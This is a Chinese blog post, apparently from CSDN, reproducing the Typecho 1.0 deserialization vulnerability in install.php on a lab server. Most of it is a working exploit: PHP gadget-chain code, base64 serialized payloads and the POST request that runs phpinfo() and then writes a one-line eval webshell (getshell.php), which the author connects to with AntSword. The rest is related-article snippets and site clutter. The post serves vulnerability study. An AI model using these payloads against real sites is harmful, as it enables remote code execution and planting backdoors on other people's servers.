typecho反序列化

最新推荐文章于 2024-10-06 08:20:35 发布
最新推荐文章于 2024-10-06 08:20:35 发布
阅读量159 收藏
点赞数 4
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cgjil/article/details/132774394
版权

typecho反序列化

环境的搭建

在这里插入图片描述

漏洞复现前提

<?php
class Typecho_Feed
{
        const RSS1 = 'RSS 1.0';
        const RSS2 = 'RSS 2.0';
        const ATOM1 = 'ATOM 1.0';
        const DATE_RFC822 = 'r';
        const DATE_W3CDTF = 'c';
        const EOL = "\n";
        private $_type;
        private $_items;

        public function __construct() {
                $this->_type = $this::RSS2;
                #$this->_type = $this::ATOM1;
                $this->_items[0] = array(
                        'category' => array(new Typecho_Request()),
                        'author' => new Typecho_Request(),
                );
        }
}
class Typecho_Request
{
        private $_params = array();
        private $_filter = array();

        public function __construct() {
                $this->_params['screenName'] = 'phpinfo()'; //此处修改需要执行的代码
                $this->_filter[0] = 'assert';
        }
}

$exp = array(
        'adapter' => new Typecho_Feed(),
        'prefix'  => 'typecho_'
);

echo base64_encode(serialize($exp));
?>

运行代码会生成相应的base64的payload,以上代码会生成

YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YToyOntzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30=

在这里插入图片描述

1.执行phpinfo

设置url为:
http://192.168.149.211/typecho_1.0-14.10.10/install.php?finish=

在这里插入图片描述

post data: __typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YToyOntzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30=

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

2. getshell

<?php
class Typecho_Request
{
    private $_params = array();
    private $_filter = array();

    public function __construct()
    {
        $this->_params['screenName'] = 'file_put_contents(\'getshell.php\',\'<?php @eval($_POST[123]);?>\')';
        $this->_filter[0] = 'assert';
    }
}

class Typecho_Feed
{
    private $_type;
    private $_items = array();
    public $dateFormat;

    public function __construct()
    {
        $this->_type = 'ATOM 1.0';
        $item['author'] = new Typecho_Request();
        $this->_items[0] = $item;
    }
}

$x = new Typecho_Feed();
$a = array(
    'adapter' => $x,
    'prefix' => 'typecho_'
);
echo "<pre>";
print_r($a);
echo "</pre>";
echo serialize($a)."<br>";
echo "__typecho_config=".base64_encode(serialize($a));
?>

file_put_contents(\'gethell.php\',\'<?php @eval($_POST[123]);?>\')
使用file_put_contents函数,将一句话木马写入文件,上传到当前目录下

在这里插入图片描述

YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mzp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NjM6ImZpbGVfcHV0X2NvbnRlbnRzKCdnZXRzaGVsbC5waHAnLCc8P3BocCBAZXZhbCgkX1BPU1RbMTIzXSk7Pz4nKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX1zOjEwOiJkYXRlRm9ybWF0IjtOO31zOjY6InByZWZpeCI7czo4OiJ0eXBlY2hvXyI7fQ==

执行:
设置url为:
http://192.168.149.211/typecho_1.0-14.10.10/install.php?finish=

__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mzp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NjM6ImZpbGVfcHV0X2NvbnRlbnRzKCdnZXRzaGVsbC5waHAnLCc8P3BocCBAZXZhbCgkX1BPU1RbMTIzXSk7Pz4nKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX1zOjEwOiJkYXRlRm9ybWF0IjtOO31zOjY6InByZWZpeCI7czo4OiJ0eXBlY2hvXyI7fQ==

在这里插入图片描述

访问getshell.php页面,shell上传成功

在这里插入图片描述

蚁剑连接
http://192.168.149.211/typecho_1.0-14.10.10/getshell.php

在这里插入图片描述

在这里插入图片描述

具体的漏洞分析,可以鉴赏这篇[Typecho前台Getshell漏洞分析](https://cloud.tencent.com/developer/article/1740471?from_column=20421&from=20421)

cgjil
关注
专栏目录
Typecho反序列化导致前台 getshell 漏洞复现
weixin_30483697的博客
10-31 404
Typecho反序列化导致前台 getshell 漏洞复现 漏洞描述: Typecho是一款快速建博客的程序,外观简洁,应用广泛。这次的漏洞通过install.php安装程序页面的反序列化函数,造成了命令执行。 影响范围:理论上这个漏洞影响Typecho 1.1(15.5.12)之前的版本 首先我还是记录一下敏感目录 http://127.0.0.1/typecho0....
typecho反序列化漏洞复现
weixin_44005410的博客
05-21 1980
0x01前言 再杭州西湖线下打AWD的时候web1就是这个漏洞,在这里复现一下,刚好巩固一下前几天学习的反序列化漏洞。 0x02漏洞分析 这是一个由unserialize()导致的一个反序列化漏洞,全局搜索unserialize(),在install.php的232行发现 <?php $config = unserialize(base64_decode(Typecho_Cookie::...
反序列化-typecho2靶场搭建(超详细)
qq_59020256的博客
01-26 416
注意这里需要数据库名,如果我们没有执行上一个导入数据库的步骤那么便不会存在typechpo的数据库名,就会报错,因此我们需要先导入数据库再进行上述步骤便不会出现错误了。这里选择使用原有数据库。
代码审计_MRCTF_typecho 反序列化
crispr的博客
04-14 874
[MRCTF2020]Ezpop_Revenge 0x01 前言 感觉代码审计需要不断练习,提高自己看代码的能力,这次从两条pop链来分析反序列化漏洞吧。 0x02 正文 这个题是一个typecho 1.2的框架,扫目录发现www.zip源码泄露,下载后进行审计,看到flag.php: <?php if(!isset($_SESSION)) session_start(); if($_SE...
typecho靶场反序列化漏洞复现
qq_59023242的博客
12-20 818
而最终我们想要传入的值应该是字符串而不是数组,所以在经过判断之后就应该使用函数call_user_func。方法 ==》 函数call_user_func ==》还需设置**$filter** ==》使用数组。referer头中的host不能为空,且请求头中的HOST要与referer头中的host一致。referer头中的host不能为空,且请求头中的HOST要与referer头中的host一致。参数可以控制的话,那么它的值就应该为,我们想要的参数。但是需要满足以下条件才能执行到。
typecho反序列化漏洞(详细过程)
qq_61991235的博客
03-13 1810
typecho反序列化 菜鸡的第一条链子,酌情参考 搭建环境 利用phpstudy+phpstrom搭建环境调试(注意php版本大于5.4) 开始 漏洞起始点 前提:get方法传?finish=1,refer=http://127.0.0.1 若不设置的话exit,程序结束 详细看install.php前面部分的代码 <?php $config = unserialize(base64_decode(Typecho_Cookie::get('__typecho
Typecho靶场PHP反序列化漏洞解析
qq_61529962的博客
12-14 367
Typecho靶场中基于PHP的反序列化漏洞解析(获取到php探针为例)
反序列化typecho2靶场漏洞-代码审计全过程(超详细)
qq_59020256的博客
01-28 1211
php· }
PHP反序列化题目记录
BaiScorpio的博客
06-20 885
最近跑去看了下PHP反序列化,发现比起java容易理解多了,主要是一些魔法函数相关反序列化、字符逃逸的反序列化、session反序列化、POP链反序列化和PHAR反序列化,以下将记录学习过程中的一些例题学习的过程。...
Typecho-CMS反序列化任意代码执行漏洞分析和复现
weixin_43058307的博客
08-10 616
Typecho-CMS反序列化 代码审计 漏洞的入口出现在install.php //判断是否已经安装 if (!isset($_GET['finish']) && file_exists(__TYPECHO_ROOT_DIR__ . '/config.inc.php') && empty($_SESSION['typecho'])) { exit; } // 挡掉可能的跨站请求 if (!empty($_GET) || !empty($_POST)) {
Typecho CMS 反序列化漏洞(CVE-2018-18753)复现
玄道的网安博客
12-21 3226
简介 Typecho原本是一款博客系统,其框架体系有别于市面上一般意义MVC框架,主体代码以自创的Widget为基类,整体非常简洁 漏洞概述 typecho 是博客CMS,前台install.php 文件存在反序列化漏洞,通过构造的反序列化字符串注入可以执行任意PHP 代码。 影响版本 typecho1.0(14.10.10) 环境搭建 下载typecho14.10.10 https://github.com/typecho/typecho/tags 按照顺序...
PHP反序列化总结
qq_42812036的博客
02-12 372
(反)序列化给我们传递对象提供了一种简单的方法。serialize()将一个对象转换成一个字符串,unserialize()将字符串还原为一个对象,在PHP应用中,序列化和反序列化一般用做缓存,比如session缓存,cookie等
网 络 安 全
最新发布
数字人生
10-06 1596
定义:网络安全是指网络系统的硬件、软件及其系统中的数据受到保护的状态。范畴硬件安全:包括网络设备、服务器、终端等物理设备的安全。软件安全:包括操作系统、应用软件、数据库等的安全。数据安全:包括数据的保密性、完整性、可用性等。
数据库常见的安全特性有哪些
lunan的博客
10-05 700
不同的数据库管理系统(如MySQL、PostgreSQL、Oracle等)在实现这些安全特性时可能会有所差异,但大多数都具备以上关键安全功能。数据库系统会通过身份验证来确定用户的身份,常见的方式有用户名/密码验证、基于证书的验证、多因素验证(MFA)等。数据库通过约束(如外键约束、唯一性约束、非空约束等)确保数据的一致性和完整性,防止未经授权的修改。数据库会对用户的权限进行管理,确保只有被授权的用户可以执行特定的操作。数据库管理员应确保每个用户只拥有执行其工作所需的最少权限,以减少潜在的风险。
如何提升企业安全生产标准化?蓝燕云安全生产标准化管理平台介绍
2409_87787504的博客
10-06 559
我国安全生产标准化体系由国家一系列详尽而全面的规定构成,旨在全方位提升企业的安全生产管理水平,确保生产活动在安全的环境下进行。核心在于《企业安全生产标准化基本规范》(GB/T 33000-2016),该规范明确了企业建立、保持与评定安全生产标准化管理体系的原则、一般要求以及八个核心技术要求体系,包括目标职责、制度化管理、教育培训、现场管理、安全风险管控及隐患排查治理、应急管理、事故管理和持续改进。这一标准广泛适用于工矿商贸企业,并鼓励其他行业参照执行。
余承东直播论道智能驾驶:激光雷达不可或缺,华为ADS 3.0引领安全创新
linjingtu的博客
10-05 448
余承东与马东的这场直播交流,不仅为公众提供了深入了解智能驾驶技术的机会,也展现了华为在智能驾驶领域的坚定信心和前瞻布局。激光雷达的广泛应用、多传感器融合的技术路线、以及鸿蒙智行ADS 3.0的创新特性,共同构成了华为智能驾驶技术的核心竞争力。随着技术的不断进步和市场环境的不断变化,华为有望在智能驾驶领域取得更加显著的成果,为用户带来更加安全、便捷、智能的出行体验。
安全服务面试
m0_74402888的博客
10-02 573
java.lang.Runtime.getRuntime().exec("net user 用户名 密码 /add");删除 conf/Catalina/localhost/下的 host-manager.xml 和 manager.xml 这两。//关闭程序,即将 web 程序关闭。这是通过 ParametersInterceptor(参数过滤器)来执行的,使用用户提供的 HTTP。Ognl 表达式语言,Struts 标签默认支持的表达式语言,必须配置 Struts 标签用,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值